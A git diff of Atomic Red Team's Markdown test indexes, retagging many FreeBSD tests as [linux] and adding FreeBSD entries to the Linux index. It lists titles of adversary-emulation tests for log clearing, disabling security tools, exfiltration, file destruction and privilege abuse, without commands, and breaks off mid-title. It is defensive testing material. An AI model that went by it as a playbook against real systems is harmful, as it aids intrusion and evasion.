@@ -2478,7 +2478,7 @@ - Atomic Test #6: Discover Specific Process - tasklist [windows] - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) - - Atomic Test #1: Permission Groups Discovery (Local) [freebsd, macos, linux] + - Atomic Test #1: Permission Groups Discovery (Local) [linux, macos] - Atomic Test #2: Basic Permission Groups Discovery Windows (Local) [windows] - Atomic Test #3: Permission Groups Discovery PowerShell (Local) [windows] - Atomic Test #4: SharpHound3 - LocalAdmin [windows] @@ -2487,7 +2487,7 @@ - Atomic Test #7: Permission Groups Discovery for Containers- Local Groups [containers] - [T1201 Password Policy Discovery](../../T1201/T1201.md) - Atomic Test #1: Examine password complexity policy - Ubuntu [linux] - - Atomic Test #2: Examine password complexity policy - FreeBSD [freebsd] + - Atomic Test #2: Examine password complexity policy - FreeBSD [linux] - Atomic Test #3: Examine password complexity policy - CentOS/RHEL 7.x [linux] - Atomic Test #4: Examine password complexity policy - CentOS/RHEL 6.x [linux] - Atomic Test #5: Examine password expiration policy - All Linux [linux] 
@@ -2501,10 +2501,10 @@ - [T1614.001 System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) - Atomic Test #1: Discover System Language by Registry Query [windows] - Atomic Test #2: Discover System Language with chcp [windows] - - Atomic Test #3: Discover System Language with locale [freebsd, linux] + - Atomic Test #3: Discover System Language with locale [linux] - Atomic Test #4: Discover System Language with localectl [linux] - Atomic Test #5: Discover System Language by locale file [linux] - - Atomic Test #6: Discover System Language by Environment Variable Query [freebsd, linux] + - Atomic Test #6: Discover System Language by Environment Variable Query [linux] - [T1012 Query Registry](../../T1012/T1012.md) - Atomic Test #1: Query Registry [windows] - Atomic Test #2: Query Registry with Powershell cmdlets [windows] @@ -2515,7 +2515,7 @@ - Atomic Test #2: Security Software Discovery - powershell [windows] - Atomic Test #3: Security Software Discovery - ps (macOS) [macos] - Atomic Test #4: Security Software Discovery - ps (Linux) [linux] - - Atomic Test #5: Security Software Discovery - pgrep (FreeBSD) [freebsd] + - Atomic Test #5: Security Software Discovery - pgrep (FreeBSD) [linux] - Atomic Test #6: Security Software Discovery - Sysmon Service [windows] - Atomic Test #7: Security Software Discovery - AV Discovery via WMI [windows] - Atomic Test #8: Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets [windows] 
@@ -2529,15 +2529,15 @@ - Atomic Test #3: Remote System Discovery - nltest [windows] - Atomic Test #4: Remote System Discovery - ping sweep [windows] - Atomic Test #5: Remote System Discovery - arp [windows] - - Atomic Test #6: Remote System Discovery - arp nix [freebsd, linux, macos] - - Atomic Test #7: Remote System Discovery - sweep [freebsd, linux, macos] + - Atomic Test #6: Remote System Discovery - arp nix [linux, macos] + - Atomic Test #7: Remote System Discovery - sweep [linux, macos] - Atomic Test #8: Remote System Discovery - nslookup [windows] - Atomic Test #9: Remote System Discovery - adidnsdump [windows] - Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects [windows] - Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects [windows] - Atomic Test #12: Remote System Discovery - ip neighbour [linux] - Atomic Test #13: Remote System Discovery - ip route [linux] - - Atomic Test #14: Remote System Discovery - netstat [freebsd] + - Atomic Test #14: Remote System Discovery - netstat [linux] - Atomic Test #15: Remote System Discovery - ip tcp_metrics [linux] - Atomic Test #16: Enumerate domain computers within Active Directory using DirectorySearcher [windows] - Atomic Test #17: Enumerate Active Directory Computers with Get-AdComputer [windows] @@ -2548,7 +2548,7 @@ - [T1046 Network Service Discovery](../../T1046/T1046.md) - Atomic Test #1: Port Scan [linux, macos] - Atomic Test #2: Port Scan Nmap [linux, macos] - - Atomic Test #3: Port Scan Nmap for FreeBSD [freebsd] + - Atomic Test #3: Port Scan Nmap for FreeBSD [linux] - Atomic Test #4: Port Scan NMap for Windows [windows] - Atomic Test #5: Port Scan using python [windows] - Atomic Test #6: WinPwn - spoolvulnscan [windows] 
@@ -2569,7 +2569,7 @@ - [T1124 System Time Discovery](../../T1124/T1124.md) - Atomic Test #1: System Time Discovery [windows] - Atomic Test #2: System Time Discovery - PowerShell [windows] - - Atomic Test #3: System Time Discovery in FreeBSD/macOS [freebsd, macos] + - Atomic Test #3: System Time Discovery in FreeBSD/macOS [linux, macos] - Atomic Test #4: System Time Discovery W32tm as a Delay [windows] - Atomic Test #5: System Time with Windows time Command [windows] @@ -2699,10 +2699,10 @@ - Atomic Test #7: Azure AD - Delete user via Azure AD PowerShell [azure-ad] - Atomic Test #8: Azure AD - Delete user via Azure CLI [azure-ad] - [T1486 Data Encrypted for Impact](../../T1486/T1486.md) - - Atomic Test #1: Encrypt files using gpg (FreeBSD/Linux) [freebsd, linux] - - Atomic Test #2: Encrypt files using 7z (FreeBSD/Linux) [freebsd, linux] - - Atomic Test #3: Encrypt files using ccrypt (FreeBSD/Linux) [freebsd, linux] - - Atomic Test #4: Encrypt files using openssl (FreeBSD/Linux) [freebsd, linux] + - Atomic Test #1: Encrypt files using gpg (FreeBSD/Linux) [linux] + - Atomic Test #2: Encrypt files using 7z (FreeBSD/Linux) [linux] + - Atomic Test #3: Encrypt files using ccrypt (FreeBSD/Linux) [linux] + - Atomic Test #4: Encrypt files using openssl (FreeBSD/Linux) [linux] - Atomic Test #5: PureLocker Ransom Note [windows] - Atomic Test #6: Encrypt files using 7z utility - macOS [macos] - Atomic Test #7: Encrypt files using openssl utility - macOS [macos] 
@@ -2712,11 +2712,11 @@ - T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1496 Resource Hijacking](../../T1496/T1496.md) - - Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [freebsd, macos, linux] + - Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [linux, macos] - T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1485 Data Destruction](../../T1485/T1485.md) - Atomic Test #1: Windows - Overwrite file with SysInternals SDelete [windows] - - Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [freebsd, linux, macos] + - Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [linux, macos] - Atomic Test #3: Overwrite deleted data on C drive [windows] - Atomic Test #4: GCP - Delete Bucket [iaas:gcp] - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -2736,14 +2736,14 @@ - [T1529 System Shutdown/Reboot](../../T1529/T1529.md) - Atomic Test #1: Shutdown System - Windows [windows] - Atomic Test #2: Restart System - Windows [windows] - - Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux] - - Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux] - - Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [freebsd, macos, linux] - - Atomic Test #6: Shutdown System via `halt` - FreeBSD/Linux [freebsd, linux] - - Atomic Test #7: Reboot System via `halt` - FreeBSD [freebsd] + - Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [linux, macos] + - Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [linux, macos] + - Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [linux, macos] + - Atomic Test #6: Shutdown System via `halt` - FreeBSD/Linux [linux] + - Atomic Test #7: Reboot System via `halt` - FreeBSD [linux] - Atomic Test #8: Reboot System via `halt` - Linux [linux] - - Atomic Test #9: Shutdown System via `poweroff` - FreeBSD/Linux [freebsd, linux] - - Atomic Test #10: Reboot System via `poweroff` - FreeBSD [freebsd] + - Atomic Test #9: Shutdown System via `poweroff` - FreeBSD/Linux [linux] + - Atomic Test #10: Reboot System via `poweroff` - FreeBSD [linux] - Atomic Test #11: Reboot System via `poweroff` - Linux [linux] - Atomic Test #12: Logoff System - Windows [windows] 
@@ -2789,11 +2789,11 @@ - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows] - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows] - Atomic Test #8: Create local account (Linux) [linux] - - Atomic Test #9: Create local account (FreeBSD) [freebsd] + - Atomic Test #9: Create local account (FreeBSD) [linux] - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux] - - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [freebsd] + - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux] - Atomic Test #12: Login as nobody (Linux) [linux] - - Atomic Test #13: Login as nobody (freebsd) [freebsd] + - Atomic Test #13: Login as nobody (freebsd) [linux] # exfiltration - T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -2807,12 +2807,12 @@ - T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) - Atomic Test #1: Exfiltrate data HTTPS using curl windows [windows] - - Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux, freebsd] + - Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux] - [T1041 Exfiltration Over C2 Channel](../../T1041/T1041.md) - Atomic Test #1: C2 Data Exfiltration [windows] - [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md) - - Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd] - - Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd] + - Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux] + - Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux] - Atomic Test #3: DNSExfiltration (doh) [windows] - T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1002 Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -2821,18 +2821,18 @@ - [T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) - Atomic Test #1: Exfiltrate data with rclone to cloud Storage - Mega (Windows) [windows] - [T1030 Data Transfer Size Limits](../../T1030/T1030.md) - - Atomic Test #1: Data Transfer Size Limits [macos, linux, freebsd] + - Atomic Test #1: Data Transfer Size Limits [macos, linux] - T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1022 Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) - - Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux, freebsd] + - Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux] - Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows] - - Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [freebsd, linux] + - Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [linux] - Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows] - Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows] - Atomic Test #6: MAZE FTP Upload [windows] - Atomic Test #7: Exfiltration Over Alternative Protocol - FTP - Rclone [windows] - Atomic Test #8: Python3 http.server [linux] - - Atomic Test #9: Python3 http.server (freebsd) [freebsd] + - Atomic Test #9: Python3 http.server (freebsd) [linux] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 69f3ccda93..0f43e5b454 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md 
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md 
@@ -5,20 +5,24 @@ - T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) - Atomic Test #1: Malicious PAM rule [linux] + - Atomic Test #2: Malicious PAM rule (freebsd) [linux] - Atomic Test #3: Malicious PAM module [linux] - T1148 HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) - - Atomic Test #1: chmod - Change file or folder mode (numeric mode) [freebsd, macos, linux] - - Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [freebsd, macos, linux] - - Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [freebsd, macos, linux] - - Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [freebsd, macos, linux] + - Atomic Test #1: chmod - Change file or folder mode (numeric mode) [linux, macos] + - Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [linux, macos] + - Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [linux, macos] + - Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [linux, macos] - Atomic Test #5: chown - Change file or folder ownership and group [macos, linux] - Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux] - - Atomic Test #7: chown - Change file or folder mode ownership only [freebsd, macos, linux] + - Atomic Test #7: chown - Change file or folder mode ownership only [linux, macos] - Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux] - Atomic Test #9: chattr - Remove immutable file attribute [macos, linux] + - Atomic Test #10: chflags - Remove immutable file attribute 
[linux] - Atomic Test #11: Chmod through c script [macos, linux] + - Atomic Test #12: Chmod through c script (freebsd) [linux] - Atomic Test #13: Chown through c script [macos, linux] + - Atomic Test #14: Chown through c script (freebsd) [linux] - T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1014 Rootkit](../../T1014/T1014.md) - Atomic Test #1: Loadable Kernel Module based Rootkit [linux] 
@@ -28,17 +32,26 @@ - T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) - Atomic Test #1: Sudo usage [macos, linux] + - Atomic Test #2: Sudo usage (freebsd) [linux] - Atomic Test #3: Unlimited sudo cache timeout [macos, linux] + - Atomic Test #4: Unlimited sudo cache timeout (freebsd) [linux] - Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux] + - Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [linux] - T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) - - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux, freebsd] + - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. 
[macos, linux] - T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) - Atomic Test #1: Detect Virtualization Environment (Linux) [linux] + - Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux] - [T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) - Atomic Test #1: rm -rf [macos, linux] + - Atomic Test #2: rm -rf [linux] + - Atomic Test #5: Truncate system log files via truncate utility (freebsd) [linux] + - Atomic Test #7: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd) [linux] + - Atomic Test #10: Overwrite FreeBSD system log via echo utility [linux] + - Atomic Test #13: Delete system log files via unlink utility (freebsd) [linux] - Atomic Test #18: Delete system journal logs via rm and journalctl utilities [linux] - Atomic Test #19: Overwrite Linux Mail Spool [linux] - Atomic Test #20: Overwrite Linux Log [linux] 
@@ -47,19 +60,28 @@ - T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) - Atomic Test #1: Clear Bash history (rm) [linux, macos] + - Atomic Test #2: Clear sh history (rm) [linux] - Atomic Test #3: Clear Bash history (echo) [linux] + - Atomic Test #4: Clear sh history (echo) [linux] - Atomic Test #5: Clear Bash history (cat dev/null) [linux, macos] + - Atomic Test #6: Clear sh history (cat dev/null) [linux] - Atomic Test #7: Clear Bash history (ln dev/null) [linux, macos] + - Atomic Test #8: Clear sh history (ln dev/null) [linux] - Atomic Test #9: Clear Bash history (truncate) [linux] + - Atomic Test #10: Clear sh history (truncate) [linux] - Atomic Test #11: Clear history of a bunch of shells [linux, macos] + - Atomic Test #12: Clear history of a bunch of shells (freebsd) [linux] - Atomic Test #13: Clear and Disable Bash History Logging [linux, macos] - Atomic Test #14: Use Space Before Command to Avoid Logging to History [linux, macos] - Atomic Test #15: Disable Bash History Logging with SSH -T [linux] + - Atomic Test #16: Disable sh History Logging with SSH -T (freebsd) [linux] - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md) - - Atomic Test #3: Base64 decoding with Python [freebsd, linux, macos] - - Atomic Test #4: Base64 decoding with Perl [freebsd, linux, macos] + - Atomic Test #3: Base64 decoding with Python [linux, macos] + - Atomic Test #4: Base64 decoding with Perl [linux, macos] - Atomic Test #5: Base64 decoding with shell utilities [linux, macos] - - Atomic Test #8: Hex decoding with shell utilities [freebsd, linux, macos] + - Atomic Test #6: Base64 decoding with shell utilities (freebsd) [linux] + - Atomic Test #7: FreeBSD b64encode Shebang in CLI [linux] + - Atomic Test #8: Hex decoding with shell utilities [linux, macos] - Atomic Test #9: 
Linux Base64 Encoded Shebang in CLI [linux, macos] - Atomic Test #10: XOR decoding and command execution using Python [linux, macos] - [T1562 Impair Defenses](../../T1562/T1562.md) 
@@ -73,18 +95,20 @@ - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) - - Atomic Test #1: Set a file's access timestamp [freebsd, linux, macos] - - Atomic Test #2: Set a file's modification timestamp [freebsd, linux, macos] - - Atomic Test #3: Set a file's creation timestamp [freebsd, linux, macos] - - Atomic Test #4: Modify file timestamps using reference file [freebsd, linux, macos] + - Atomic Test #1: Set a file's access timestamp [linux, macos] + - Atomic Test #2: Set a file's modification timestamp [linux, macos] + - Atomic Test #3: Set a file's creation timestamp [linux, macos] + - Atomic Test #4: Modify file timestamps using reference file [linux, macos] - T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1009 Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1562.004 Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) - Atomic Test #7: Stop/Start UFW firewall [linux] + - Atomic Test #8: Stop/Start Packet Filter [linux] - Atomic Test #9: Stop/Start UFW firewall systemctl [linux] - Atomic Test #10: Turn off UFW logging [linux] - Atomic Test #11: Add and delete UFW firewall rules [linux] + - Atomic Test #12: Add and delete Packet Filter rules [linux] - Atomic Test #13: Edit UFW firewall user.rules file [linux] - Atomic Test #14: Edit UFW firewall ufw.conf file [linux] - Atomic Test #15: Edit UFW firewall sysctl.conf file [linux] 
@@ -94,8 +118,8 @@ - Atomic Test #19: Modify/delete iptables firewall rules [linux] - T1107 File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) - - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [freebsd, macos, linux] - - Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [freebsd, macos, linux] + - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [linux, macos] + - Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [linux, macos] - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] 
@@ -104,16 +128,21 @@ - T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) - Atomic Test #1: Make and modify binary from C source [macos, linux] + - Atomic Test #2: Make and modify binary from C source (freebsd) [linux] - Atomic Test #3: Set a SetUID flag on file [macos, linux] + - Atomic Test #4: Set a SetUID flag on file (freebsd) [linux] - Atomic Test #5: Set a SetGID flag on file [macos, linux] + - Atomic Test #6: Set a SetGID flag on file (freebsd) [linux] - Atomic Test #7: Make and modify capabilities of a binary [linux] - Atomic Test #8: Provide the SetUID capability to a file [linux] - - Atomic Test #9: Do reconnaissance for files that have the setuid bit set [freebsd, linux] - - Atomic Test #10: Do reconnaissance for files that have the setgid bit set [freebsd, linux] + - Atomic Test #9: Do reconnaissance for files that have the setuid bit set [linux] + - Atomic Test #10: Do reconnaissance for files that have the setgid bit set [linux] - T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1562.006 Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) - Atomic Test #1: Auditing Configuration Changes on Linux Host [linux] + - Atomic Test #2: Auditing Configuration Changes on FreeBSD Host [linux] - Atomic Test #3: Logging Configuration Changes on Linux Host [linux] + - Atomic Test #4: Logging Configuration Changes on FreeBSD Host [linux] - T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -128,16 +157,20 @@ - T1564.002 Hide Artifacts: Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md) - Atomic Test #1: Disable history collection [linux, macos] + - Atomic Test #2: Disable history collection (freebsd) [linux] - Atomic Test #3: Mac HISTCONTROL [macos, linux] - Atomic Test #4: Clear bash history [linux] - Atomic Test #5: Setting the HISTCONTROL environment variable [linux] - Atomic Test #6: Setting the HISTFILESIZE environment variable [linux] + - Atomic Test #7: Setting the HISTSIZE environment variable [linux] - Atomic Test #8: Setting the HISTFILE environment variable [linux] + - Atomic Test #9: Setting the HISTFILE environment variable (freebsd) [linux] - Atomic Test #10: Setting the HISTIGNORE environment variable [linux] - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md) - Atomic Test #1: Disable syslog [linux] + - Atomic Test #2: Disable syslog (freebsd) [linux] - Atomic Test #3: Disable Cb Response [linux] - Atomic Test #4: Disable SELinux [linux] - Atomic Test #5: Stop Crowdstrike Falcon on Linux [linux] 
@@ -145,28 +178,30 @@ - Atomic Test #40: Suspend History [linux] - Atomic Test #41: Reboot Linux Host via Kernel System Request [linux] - Atomic Test #42: Clear Pagging Cache [linux] - - Atomic Test #43: Disable Memory Swap [freebsd, linux] + - Atomic Test #43: Disable Memory Swap [linux] - Atomic Test #47: Tamper with Defender ATP on Linux/MacOS [linux, macos] - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1027 Obfuscated Files or Information](../../T1027/T1027.md) - Atomic Test #1: Decode base64 Data into Script [macos, linux] + - Atomic Test #2: Decode base64 Data into Script [linux] - T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1036.003 Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md) - - Atomic Test #2: Masquerading as FreeBSD or Linux crond process. [freebsd, linux] + - Atomic Test #2: Masquerading as FreeBSD or Linux crond process. 
[linux] - T1562.011 Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md) - Atomic Test #1: Install root CA on CentOS/RHEL [linux] + - Atomic Test #2: Install root CA on FreeBSD [linux] - Atomic Test #3: Install root CA on Debian/Ubuntu [linux] - [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md) - - Atomic Test #3: C compile [freebsd, linux, macos] - - Atomic Test #4: CC compile [freebsd, linux, macos] - - Atomic Test #5: Go compile [freebsd, linux, macos] + - Atomic Test #3: C compile [linux, macos] + - Atomic Test #4: CC compile [linux, macos] + - Atomic Test #5: Go compile [linux, macos] - T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1564.003 Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1500 Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -177,10 +212,11 @@ - T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md) - - Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [freebsd, linux, macos] - - Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [freebsd, linux, macos] + - Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [linux, macos] + - Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [linux, macos] - Atomic Test #3: Overwrite and delete a file with shred [linux] - Atomic Test #8: Delete Filesystem - Linux [linux] + - Atomic Test #9: Delete Filesystem - FreeBSD [linux] - T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1027.002 Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md) - Atomic Test #1: Binary simply packed by UPX (linux) [linux] 
@@ -190,15 +226,19 @@ - T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1036.006 Masquerading: Space after Filename](../../T1036.006/T1036.006.md) - Atomic Test #2: Space After Filename [macos, linux] + - Atomic Test #3: Space After Filename (FreeBSD) [linux] - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md) - - Atomic Test #1: Create a hidden file in a hidden directory [freebsd, linux, macos] + - Atomic Test #1: Create a hidden file in a hidden directory [linux, macos] - T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) - Atomic Test #8: Create local account (Linux) [linux] + - Atomic Test #9: Create local account (FreeBSD) [linux] - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux] + - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux] - Atomic Test #12: Login as 